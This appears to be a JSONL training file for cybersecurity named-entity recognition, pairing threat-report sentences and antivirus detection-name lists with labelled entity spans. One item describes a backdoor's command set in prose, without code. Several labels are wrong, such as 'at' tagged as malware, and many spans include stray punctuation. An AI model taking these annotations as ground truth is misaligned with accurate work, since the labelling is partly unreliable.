{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9593 Trojan.Evrial!G1 Trojan.Win32.Stealer.exjasr Trojan.PWS.Stealer.21117 BehavesLike.Win32.Backdoor.ch TR/PSW.CoinStealer.nvgeg Trojan.Win32.Z.Razy.139264.GJ Trojan:MSIL/Evrial.B MSIL.Packed.Kryptik.JH Trj/GdSda.A Win32/Trojan.322", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004606", "source": "cyner2_train"}}
{"text": "Using an FTP server has some advantages.", "spans": {}, "info": {"id": "cyner2_train_004607", "source": "cyner2_train"}}
{"text": "The threat group continually updated the Nemesis malware during their ongoing access to the victim environment, deploying several different variants of the same tools and adding functionality between iterations.", "spans": {"THREAT_ACTOR: threat group": [[4, 16]], "MALWARE: Nemesis malware": [[41, 56]]}, "info": {"id": "cyner2_train_004609", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.RedZone.406528 Trojan/PSW.RedZone.41 Win32/PSW.RedZone.41 TSPY_REDZONE.E Win.Spyware.62275-2 Trojan-PSW.Win32.RedZone.41 Trojan.Win32.RedZone.fqhw Trojan.Win32.A.PSW-RedZone.406528[h] Troj.PSW32.W.RedZone.41!c Win32.Trojan-qqpass.Qqrob.Dyzy TrojWare.Win32.PSW.RedZone.41 Trojan.PWS.RedZone.41 Trojan.RedZone.Win32.21 W32/Risk.MXEM-1318 Trojan/PSW.RedZone.41 TR/PSW.RedZone.41 Malware_fam.gw Trojan[PSW]/Win32.RedZone PWS:Win32/Redzone.4_1 TrojanPSW.RedZone Trojan.PWS.RedZone!tcLid0irw8w Trojan.Win32.PSW Win32/Trojan.PSW.087", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004610", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sality.PE Trojan.Dropper.UYL Virus/W32.Sality.D W32.Sality.U Trojan.Dropper.UYL Virus.Sality.Win32.25 Trojan.Dropper.UYL W32.SillyFDC Win32/Sality.AA WORM_SILLY.SMRP Trojan.Dropper.UYL Trojan.Win32.Crypted.cqxgku Trojan.Win32.Dropper.abl Trojan.Dropper.UYL Trojan.Dropper.UYL Win32.Sector.30 WORM_SILLY.SMRP BehavesLike.Win32.Sality.th Win32/HLLP.Kuku.poly2 W32/Sality.AT Worm:Win32/Enosch.A Win32.Virus.Sality.A HEUR/Fakon.mwf Virus.Win32.Sality.bakc Trojan.DataStealer.B Win32/Sality.NBA Win32.Sality.BL Trojan.Win32.Enosch W32/DataStealer.B!tr W32/Sality.AA Virus.Win32.Sality.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004611", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.BLA.FC.3019 Variant.Kazy.msZ5 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.MulDrop4.60646 Trojan-PWS.MSIL PWS:MSIL/Mintluks.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004612", "source": "cyner2_train"}}
{"text": "This attack is particularly effective since execution of WTP is not accompanied by a security warning and users have been conditioned to run the troubleshooter when it appears in Windows.", "spans": {"VULNERABILITY: WTP": [[57, 60]], "SYSTEM: Windows.": [[179, 187]]}, "info": {"id": "cyner2_train_004613", "source": "cyner2_train"}}
{"text": "During ISSP Labs daily threat activity monitoring a new virus distribution campaign with a unique malware sample was discovered.", "spans": {"ORGANIZATION: ISSP Labs": [[7, 16]], "THREAT_ACTOR: new virus distribution campaign": [[52, 83]], "MALWARE: malware": [[98, 105]]}, "info": {"id": "cyner2_train_004614", "source": "cyner2_train"}}
{"text": "The attacks likely were initially delivered via spear-phishing e-mails, or as demonstrated by C0d0so0 in the past, legitimate websites that had been previously compromised then used as watering holes for the selected victims.", "spans": {"THREAT_ACTOR: C0d0so0": [[94, 101]]}, "info": {"id": "cyner2_train_004615", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Bendis.AU X97M.Dropper.ID W97M.Bendis.AU W97M.Downloader X2KM_DROPPER.NEZ W97M.Bendis.AU Trojan.Ole2.Vbs-heuristic.druvzi W97M.Bendis.AU W97M.Bendis.AU X2KM_DROPPER.NEZ X97M/Dropper.c HEUR.VBA.Trojan.d TrojanDropper:O97M/Credoor.A X97M/Dropper.d W97M.Bendis W97M.Bendis.AU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004616", "source": "cyner2_train"}}
{"text": "Indicators related to a group of attackers that have been targeting Japan for a few years and are responsible for recent breaches against Japanese targets", "spans": {"THREAT_ACTOR: group of attackers": [[24, 42]], "ORGANIZATION: Japanese targets": [[138, 154]]}, "info": {"id": "cyner2_train_004617", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Rovnix.Win64.17 Troj.Win64.Rovnix!c Trojan.Win64.Rovnix.au Trojan.Win64.Mayachok.dsethy Trojan.Mayachok.19009 Trojan/Rovnix.f W32.Rovnix TR/Rovnix.I Trojan/Win64.Rovnix Trojan.Win64.Rovnix.au Trojan/Win64.Rovnix.R175307 Trojan.Rovnix Trj/Rovnix.B Win64.Trojan.Rovnix.Pdmr Trojan.Rovnix!6RUsEoDKtkI Trojan.Win64.Rovnix Win32/Trojan.52f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004618", "source": "cyner2_train"}}
{"text": "These .jar files are most often identified as Adwind.", "spans": {"MALWARE: Adwind.": [[46, 53]]}, "info": {"id": "cyner2_train_004619", "source": "cyner2_train"}}
{"text": "A new Android banking trojan called Nexus has been promoted via a Malware-as-Service subscription service, but is still in its early stages, suggests security researcher Cleafy's analysis.", "spans": {"MALWARE: Android banking trojan": [[6, 28]], "MALWARE: Nexus": [[36, 41]], "MALWARE: a Malware-as-Service subscription service,": [[64, 106]], "ORGANIZATION: security researcher Cleafy's analysis.": [[150, 188]]}, "info": {"id": "cyner2_train_004620", "source": "cyner2_train"}}
{"text": "A backdoor also known as:", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004622", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.AIG Trojan/W32.Xorist.13312.E Trojan-Ransom.Win32.Xorist!O Trojan.Ransom.FO4 Trojan.Ransom.AIG Win32.Trojan.Filecoder.g Ransom.CryptoTorLocker Ransom_XORIST.SMA Win.Trojan.CryptoTorLocker2015-1 Trojan.Ransom.AIG Trojan-Ransom.Win32.Xorist.lk Trojan.Ransom.AIG Trojan.Win32.Xorist.dxuuhl Trojan.Win32.A.Xorist.1268736 Trojan.Ransom.AIG TrojWare.Win32.Kryptik.ER Trojan.Encoder.94 Ransom_XORIST.SMA Trojan/Xorist.at TR/Ransom.Xorist.EJ Trojan[Ransom]/Win32.Xorist Trojan.Ransom.AIG Troj.Ransom.W32.Xorist.tnPf Trojan-Ransom.Win32.Xorist.lk Ransom:Win32/Sorikrypt.A Trojan/Win32.Xorist.R21676 Hoax.Xorist Ransom.FileCryptor Trj/RansomXor.A Trojan.Win32.CryptoTorLocker2015.a Trojan-Ransom.CryptoTorLocker215 Win32/Trojan.1ee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004625", "source": "cyner2_train"}}
{"text": "I am not sure what these are but am guessing at possibly Emotet banking Trojan", "spans": {"MALWARE: Emotet banking Trojan": [[57, 78]]}, "info": {"id": "cyner2_train_004626", "source": "cyner2_train"}}
{"text": "While most of the interest still lies in the public sector, more recent attacks were found targeting the following industries:Aviation Broadcasting Energy Financial Non-governmental organizations NGO Pharmaceutical Public sector Publishing Software", "spans": {"ORGANIZATION: public sector,": [[45, 59]], "ORGANIZATION: industries:Aviation Broadcasting Energy Financial Non-governmental organizations NGO Pharmaceutical Public sector Publishing Software": [[115, 248]]}, "info": {"id": "cyner2_train_004627", "source": "cyner2_train"}}
{"text": "ESET contacted Eltima as soon as the situation was confirmed.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "ORGANIZATION: Eltima": [[15, 21]]}, "info": {"id": "cyner2_train_004628", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MalPack Trojan.Graftor.D69EE1 Win32.Trojan.Kryptik.pd Ransom_LOCKY.SMXA Trojan.Win32.Kryptik.evdsll Ransom_LOCKY.SMXA BehavesLike.Win32.Upatre.qh TrojanDownloader:Win32/Brucryp.G Trj/GdSda.A W32/Kryptik.EXPV!tr Win32/Trojan.160", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004630", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Script.473379 Trojan/W32.Clicker.349278 Trojan.Clicker.r5 Trojan.Script.473379 Trojan.Win32.MLW.lvntl W32/MalwareF.CARP Trojan.ADH Trojan.Win32.Clicker.hd Trojan.Win32.S.Clicker.349278[h] Trojan.Script.473379 Trojan.Script.473379 Trojan.DownLoader6.110 BehavesLike.Win32.Dropper.fc W32/Risk.VMFK-0127 Trojan/Clicker.je Trojan.Script.D73923 Trojan:Win32/Gleishug.C Trojan.Script.473379 Trj/CI.A Win32.Trojan.Clicker.Hoye AdWare.FTat Trojan.Script.473379", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004631", "source": "cyner2_train"}}
{"text": "In late 2014, ESET presented an attack campaign that had been observed over a period of time targeting Russia and other Russian speaking nations, dubbed Roaming Tiger", "spans": {"ORGANIZATION: ESET": [[14, 18]], "THREAT_ACTOR: attack campaign": [[32, 47]], "ORGANIZATION: Russian speaking nations,": [[120, 145]], "THREAT_ACTOR: Roaming Tiger": [[153, 166]]}, "info": {"id": "cyner2_train_004632", "source": "cyner2_train"}}
{"text": "Its different modifications target mobile devices of Russian users from February 2015.", "spans": {"SYSTEM: mobile devices": [[35, 49]], "ORGANIZATION: Russian users": [[53, 66]]}, "info": {"id": "cyner2_train_004633", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MasendosA.Trojan Worm.Win32.AutoRun!O Trojan.Tofsee.1 Win32.Trojan.WisdomEyes.16070401.9500.9997 Win.Worm.Autorun-6961 P2P-Worm.Win32.Palevo.idwe Trojan.Win32.Graz.vhpfw Worm.Win32.A.AutoRun.90112 TrojWare.Win32.Kryptik.JIU Win32.HLLM.Graz Worm.AutoRun.Win32.31130 BehavesLike.Win32.Downloader.kc Worm.Win32.Wergimog Worm/AutoRun.agqt TR/Offend.5523698 Worm[P2P]/Win32.Palevo Worm:Win32/Wergimog.A P2P-Worm.Win32.Palevo.idwe Worm/Win32.Cynic.R5955 Worm.AutoRun Win32/AutoRun.IRCBot.HL Win32.Worm-p2p.Palevo.Swub Worm.AutoRun!FV4PXQUzhXU Win32/Trojan.515", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004634", "source": "cyner2_train"}}
{"text": "Over the past few months there has been a lot of research and press coverage on the Shamoon campaigns.", "spans": {"THREAT_ACTOR: the Shamoon campaigns.": [[80, 102]]}, "info": {"id": "cyner2_train_004635", "source": "cyner2_train"}}
{"text": "A sophisticated hacking group with suspected ties to cybercrime gangs operating in Eastern Europe is now actively targeting and breaching prominent, brand name restaurants in the U.S.", "spans": {"THREAT_ACTOR: sophisticated hacking group": [[2, 29]], "THREAT_ACTOR: cybercrime gangs operating": [[53, 79]], "ORGANIZATION: restaurants": [[160, 171]]}, "info": {"id": "cyner2_train_004638", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.Win64 Exploit.Win64.Apolmy.ewzxbo Trojan.Win64.Dianti TR/Apolmy.paocz Trojan:Win64/Apolmy.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004639", "source": "cyner2_train"}}
{"text": "This EPS exploit was assigned CVE-2015-2545.", "spans": {"MALWARE: EPS exploit": [[5, 16]]}, "info": {"id": "cyner2_train_004640", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sality.mBZF Trojan.Win32.Clicker.bcgwsn Trojan.Click2.33988 Trojan.Win32.Alyak W32/Trojan.WWZX-6000 TR/Graftor.27537.200 Trojan/Win32.Unknown Backdoor:Win32/Kanav.D BScope.Trojan.Win32.Inject.2 Trj/CI.A Trojan.Symmi.DB644 Win32/Trojan.070", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004641", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Clicker.Delf.JK Trojan-Clicker.Win32.Delf!O Trojan.Clicker.Delf.JK Win32.Trojan-Downloader.Delf.bq Win32/Bancos.QQM TROJ_CLICKER.ATG Win.Trojan.Delf-2308 Trojan-Clicker.Win32.Delf.ih Trojan.Clicker.Delf.JK Trojan.Win32.Delf.dxqhln Win32.Trojan.Delf.Eamx Trojan.Clicker.Delf.JK Trojan.Clicker.Delf.JK Trojan.Badjoke TROJ_CLICKER.ATG TrojanClicker.Delf.fq TR/Clicker.Delf.IH Trojan[Clicker]/Win32.Delf Trojan.Win32.Clicker.475648 Trojan-Clicker.Win32.Delf.ih Trojan.Clicker.Delf.JK Trojan/Win32.AdClicker.R5452 Trojan.Clicker.Delf.JK TrojanClicker.Delf Win32/TrojanDownloader.Delf.OVE Trojan.CL.Delf.BJTO Trojan-Dropper.Delf W32/Delf.YS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004643", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.MultiJoiner!O Troj.Dropper.W32.Pincher.lfij Trojan.Heur.GM.11400100A0 Win32.Trojan.WisdomEyes.16070401.9500.9992 Win32/MicroJoiner.A TROJ_MULTIJOIN.A Trojan-Dropper.Win32.Microjoin.ap TrojWare.Win32.Spy.Zbot.AAT Trojan.MulDrop.613 BehavesLike.Win32.Trojan.vc Trojan-PWS.Win32.LdPinch TrojanDropper.MultiJoiner.13.b Win32.Troj.GaoPSGet.49893 TrojanDropper:Win32/MultiJoiner.A Trojan-Dropper.Win32.Microjoin.ap Dropper/Win32.Microjoin.C70525 Trj/Multijoiner.A Win32/TrojanDropper.MultiJoiner.13.B Trojan.DR.MultiJoiner.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004646", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O Downloader.Small.16212 Win32.Trojan.WisdomEyes.16070401.9500.9891 Win32/Kotan.20.A Trojan-Downloader.Win32.Small.fbn Trojan.Win32.Kotan.hadu Troj.Downloader.W32.Small.fbn!c Win32.Trojan-Downloader.Small.cmak TrojWare.Win32.TrojanDownloader.Kotan Trojan.Kaotan Downloader.Small.Win32.3682 TrojanDownloader.Kotan.b W32.Malware.Downloader Win32.Troj.Kotan.kcloud TrojanDownloader:Win32/Kotan.A Trojan-Downloader.Win32.Small.fbn Trojan/Win32.HDC.C69071 TrojanDownloader.Small Win32/TrojanDownloader.Kotan Trojan.DL.Small!ILxLTxTzCnE Trojan-Downloader.Win32.Kotan", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004647", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan-GameThief.Win32.OnLineGames!O Trojan/Dropper.Killav.lt Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Fiala.A Win.Trojan.Geral-941 Trojan-Dropper.Win32.Killav.lt Trojan.Win32.Killav.dqiwur Troj.Dropper.W32.Killav.lt!c Win32.Trojan-dropper.Killav.Sunr Backdoor.Win32.Popwin.~IT Trojan.KillProc.13934 Dropper.Killav.Win32.187 BehavesLike.Win32.PWSOnlineGames.mc Trojan-Downloader.Win32.Geral Trojan/PSW.Magania.amzf Trojan[Downloader]/Win32.Geral TrojanDownloader:Win32/Dogkild.S Trojan/Win32.OnlineGameHack.R38048 BScope.Trojan.SvcHorse.01643 Trj/Pupack.A Win32/AutoRun.KillAV.I Trojan.DR.Killav!1BWU2jDjRDE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004648", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Trojan.Mauvaise.SL1 Trojan.Badur.Win32.8423 Trojan.Win32.Badur.dgkukl Win32.Trojan.Fakedoc.Auto TrojWare.Win32.Imwee.A BackDoor.Bulknet.1486 TR/Dldr.Imwee Trojan/Win32.Badur Trojan.Zusy.D39D62 Backdoor/Win32.Trojan.C753557 Win32/Trojan.IM.66a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004649", "source": "cyner2_train"}}
{"text": "A backdoor also known as: JS/Iframe.DGS Script.Trojan-Downloader.IFrame.AE Trojan-Downloader.JS.Iframe.deg Trojan.Script.Expack.bvtkmp PDF.DownLoader.3 BehavesLike.PDF.BadFile.db JS/BlacoleRef.CZ.29 Trojan[Downloader]/JS.Iframe.deg Trojan-Downloader.JS.Iframe.deg JS/Moat.241E54F!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004650", "source": "cyner2_train"}}
{"text": "Fileless threats and ransomware aren't new, but a malware that incorporates a combination of their characteristics can be dangerous.", "spans": {"MALWARE: Fileless threats": [[0, 16]], "MALWARE: ransomware": [[21, 31]], "MALWARE: malware": [[50, 57]]}, "info": {"id": "cyner2_train_004651", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Skillis.a W32/Trojan.PYDC-5827 W32.SillyFDC Win32/Oflwr.A!crypt Win32.Application.PUPStudio.A Trojan.Win32.Skillis.cqimdi Trojan.DownLoader21.39298 Trojan.Skillis.Win32.2785 TR/Drop.KillAV.A.69 Trojan/Win32.Unknown TrojanDropper:Win32/Killav.A Trojan/Win32.Backdoor.R142720 Trojan.Skillis Trojan.Win32.Skillis.aaa Trojan.PWS.Banbra!0kkWPO51+fM Win32.Outbreak W32/QQPass.ELG!tr.pws Win32/Trojan.7d3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004652", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.DAD1ED Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.ESEG-0989 Trojan.MSIL.Crypt.fpoa Trojan.Win32.Crypt.evvrmx BackDoor.Tordev.976 BehavesLike.Win32.Trojan.fc TR/Dropper.MSIL.lfcge Trojan:Win32/Rebhip.AA!bit Trojan.MSIL.Crypt.fpoa Trj/GdSda.A Msil.Trojan.Crypt.Hfp Trojan.MSIL.Injector MSIL/Injector.LHM!tr Win32/Trojan.658", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004653", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Infostealer.Jackpos BKDR_JACKPOS.SM BKDR_JACKPOS.SM BehavesLike.Win32.Dropper.ch Trojan.Win32.Jinupd W32/Trojan.RTKE-0140 Trojan:Win32/Jinupd.B Trojan/Win32.HDC.C743594 Trj/JackPos.A Win32/Trojan.2d8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004654", "source": "cyner2_train"}}
{"text": "First observed in July 2014, Dridex, a financial banking Trojan, is considered the successor to the GameOver ZeuS GoZ malware.", "spans": {"MALWARE: Dridex,": [[29, 36]], "MALWARE: financial banking Trojan,": [[39, 64]], "MALWARE: GameOver ZeuS GoZ malware.": [[100, 126]]}, "info": {"id": "cyner2_train_004655", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Sdbot Backdoor/SdBot.zj Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Sdbot.MAM W32.Spybot.Worm Win32/Dopbot.B WORM_SDBOT.CGE Win.Trojan.SdBot-3536 Backdoor.Win32.SdBot.zj Trojan.Win32.SdBot.esce Backdoor.Win32.SdBot.28160.B Backdoor.W32.SdBot.zj!c BackDoor.IRC.Veritas Backdoor.SdBot.Win32.2281 WORM_SDBOT.CGE BehavesLike.Win32.Backdoor.mc Packed.Morphine.a WORM/IrcBot.28160.1 Trojan[Backdoor]/Win32.SdBot Backdoor.Win32.SdBot.zj BScope.Trojan-PSW.Gomex.8 W32/Gaobot.FCZ.worm IRC/SdBot.DWM Win32.Backdoor.Sdbot.Pavs Worm.SdBot!xpvJkAbKgi0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004656", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.MultiUnwrapper Win32.Trojan.WisdomEyes.16070401.9500.9852 Infostealer.Gampass Win.Trojan.736804-1 HackTool.Win32.MultiUnwrapper Trojan[Dropper]/Win32.Dapato Trj/CI.A Riskware.HackTool!LCoXxVEhnjI Win32/Trojan.03f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004657", "source": "cyner2_train"}}
{"text": "APT-C-36, also known as Blind Eagle, has been actively targeting organizations in Colombia and Ecuador since at least 2019.", "spans": {"THREAT_ACTOR: APT-C-36,": [[0, 9]], "THREAT_ACTOR: Blind Eagle,": [[24, 36]], "ORGANIZATION: organizations": [[65, 78]]}, "info": {"id": "cyner2_train_004658", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.Rugo Trojan.Win32.BHO.fie AdWare.Win32.BHO.cdg Trojan.MulDrop.15726 TR/BHO.fie TrojanDropper:Win32/Jhee.V Trojan.Win32.BHO.fie Adware.WSearch.O Trojan.Win32.Jhee.V Trojan.BHO.fie", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004660", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Cabby Trojan/Filecoder.MaktubLocker.c Win32.Trojan.WisdomEyes.16070401.9500.9999 RANSOM_CRYPMAKTUBLOCKER_GC3101B5.UVPM Trojan.Win32.Banpak.bbb Trojan.Win32.Cabby.emrzuq W32.Virut.lyDR Trojan.DownLoader24.13143 Downloader.Cabby.Win32.1871 RANSOM_CRYPMAKTUBLOCKER_GC3101B5.UVPM TrojanDownloader.Cabby.cpa TR/Crypt.Xpack.wgudg Trojan[Downloader]/Win32.Cabby Trojan.Razy.D255EB Trojan.Win32.Ransom.59904.R Trojan.Win32.Banpak.bbb Trojan/Win32.Locky.R197360 TrojanDownloader.Cabby Win32/Filecoder.MaktubLocker.C Trojan.Filecoder!sTyUXy4/Qig", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004661", "source": "cyner2_train"}}
{"text": "The Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of tools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating system.", "spans": {"THREAT_ACTOR: Sofacy group,": [[4, 17]], "THREAT_ACTOR: APT28, Pawn Storm, Fancy Bear,": [[32, 62]], "THREAT_ACTOR: Sednit,": [[67, 74]], "MALWARE: tools": [[110, 115]], "ORGANIZATION: individuals": [[161, 172]], "ORGANIZATION: aerospace industry": [[180, 198]], "SYSTEM: OS X operating system.": [[211, 233]]}, "info": {"id": "cyner2_train_004665", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Androm.266082.B Trojandownloader.Macdowpay Trojan.Win32.Godzilla.ephbuw Trojan.Encoder.11909 Backdoor.Androm.Win32.43313 BehavesLike.Win32.Backdoor.dc Trojan.Yakes.vjn Trojan.Backdoor.Quakbot TR/Fuery.shpvm TrojanDownloader:Win32/Macdowpay.A Trojan.Razy.D2B7A8 Trojan/Win32.Locky.R201696 Backdoor.Androm Backdoor.Andromeda Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004666", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Horst Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Downloader.OMUB-6519 Trojan-Proxy.Win32.Horst.av Trojan.Win32.Horst.dqlqvp Trojan.DownLoader.9121 W32/Downloader.YSQ Trojan[Proxy]/Win32.Horst Trojan-Proxy.Win32.Horst.av TrojanProxy.Horst", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004667", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan-PSW.OLGames.bp W32.Rontokbro@mm Trojan.Win32.Krap.dazptt Trojan.Win32.Z.Onlinegames.25088.A Trojan.Click3.21708 BehavesLike.Win32.PWSOnlineGames.mc W32/Trojan.UITW-4840 Trojan/PSW.OnLineGames2.dg PWS:Win32/Zakahic.A Win32.Trojan.Dropper.Heur Trojan.Win32.OnlineGames.daq Trojan-GameThief.Win32.OnLineGames W32/Onlinegames.PYY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004668", "source": "cyner2_train"}}
{"text": "This new threat actor we are naming YoroTrooper has been targeting governments across Eastern Europe since at least June 2022, and Cisco Talos has found three different activity clusters with overlapping infrastructure that are all linked to the same threat actor.", "spans": {"THREAT_ACTOR: threat actor": [[9, 21]], "THREAT_ACTOR: YoroTrooper": [[36, 47]], "ORGANIZATION: governments": [[67, 78]], "MALWARE: at": [[107, 109]], "ORGANIZATION: Cisco Talos": [[131, 142]], "SYSTEM: infrastructure": [[204, 218]], "THREAT_ACTOR: the same threat actor.": [[242, 264]]}, "info": {"id": "cyner2_train_004671", "source": "cyner2_train"}}
{"text": "The code contains multiple comments in Italian , here is the most noteworthy example : “ Receive commands from the remote server , here you can set the key commands to command the virus ” Here are the available commands : Name Description cd Change current directory to specified quit Close the socket nggexe Execute received command via Python ’ s subprocess.Popen ( ) without outputs ngguploads Upload specified file to the specified URL nggdownloads Download content from the specified URLs and save to specified file nggfilesystem Dump file structure of the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module .", "spans": {"SYSTEM: Python": [[338, 344]]}, "info": {"id": "cyner2_train_004672", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/SillyPWS.CT Trojan-Spy.MSIL!IK Trojan.MulDrop1.16499 TrojanSpy.MSIL.acx PWS:MSIL/VB.B Trojan-Spy.MSIL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004673", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9994 Trojan.Win32.Waldek.aqji Trojan.Win32.Dwn.dzdxxu BackDoor.PlugX.7 Dropper.Dapato.Win32.27346 BehavesLike.Win32.MultiPlug.fh TrojanDropper.Dapato.snz TR/AD.Plugx.M.6 Trojan[Dropper]/Win32.Dapato Trojan.Win32.Waldek.aqji Backdoor:Win32/Plugx.L!dha Trj/GdSda.A Win32.Trojan.Waldek.Wrgj Trojan.Win32.Crypt W32/Kryptik.DGGW!tr TrojanDropper.Dapato Win32/Trojan.bdb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004674", "source": "cyner2_train"}}
{"text": "Unfortunately, malware authors often utilize these same capabilities to compromise systems.", "spans": {"THREAT_ACTOR: malware authors": [[15, 30]], "SYSTEM: compromise systems.": [[72, 91]]}, "info": {"id": "cyner2_train_004675", "source": "cyner2_train"}}
{"text": "This notable characteristic made this attack worthy of further analysis.", "spans": {}, "info": {"id": "cyner2_train_004677", "source": "cyner2_train"}}
{"text": "First, this domain pattern looks just like the extremely prevalent, yet benign Akamai CDN domain.", "spans": {"ORGANIZATION: Akamai": [[79, 85]], "SYSTEM: CDN": [[86, 89]]}, "info": {"id": "cyner2_train_004681", "source": "cyner2_train"}}
{"text": "A backdoor also known as: WORM_DORKBOT.SMA Win32.Trojan.WisdomEyes.16070401.9500.9989 Trojan.FakeAV WORM_DORKBOT.SMA Packed.Win32.Katusha.o Trojan.Win32.Katusha.exnjhu BehavesLike.Win32.PWSZbot.qc Packed.Katusha.agmk Trojan.Downloader.126 Packed.Win32.Katusha.o Win32.Worm.Autorun.E Trojan/Win32.Cosmu.C71744 W32/Crypt.AAAI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004683", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Udsdangerousobject.Multi Trojan.Waldek.Win32.5328 Uds.Dangerousobject.Multi!c BKDR_REMCOS.DRQW Trojan.Win32.Waldek.akql Trojan.Win32.Waldek.etvwxi Trojan.Win32.Z.Highconfidence.731416 BKDR_REMCOS.DRQW Trojan.Win32.Waldek W32/Trojan.CSQN-6734 W32.Waldek.Akql TR/Waldek.rludr Trojan/Win32.Waldek Trojan:Win32/Vonocksu.A Trojan.Win32.Waldek.akql Trojan/Win32.Waldek.C2216962 Trj/GdSda.A Win32.Trojan.Waldek.Htvv W32/REMCOS.DRQW!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004684", "source": "cyner2_train"}}
{"text": "Unlike other ATM malware families, Alice cannot be controlled via the numeric pad of ATMs; neither does it have information stealing features.", "spans": {"MALWARE: ATM malware families, Alice": [[13, 40]], "MALWARE: ATMs;": [[85, 90]]}, "info": {"id": "cyner2_train_004685", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Malware.1 W32.Mailbancos@mm Win32.Mailbancos@mm W32.Mailbancos@mm SHeur2.XWF Trj/Banbra.GGU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004687", "source": "cyner2_train"}}
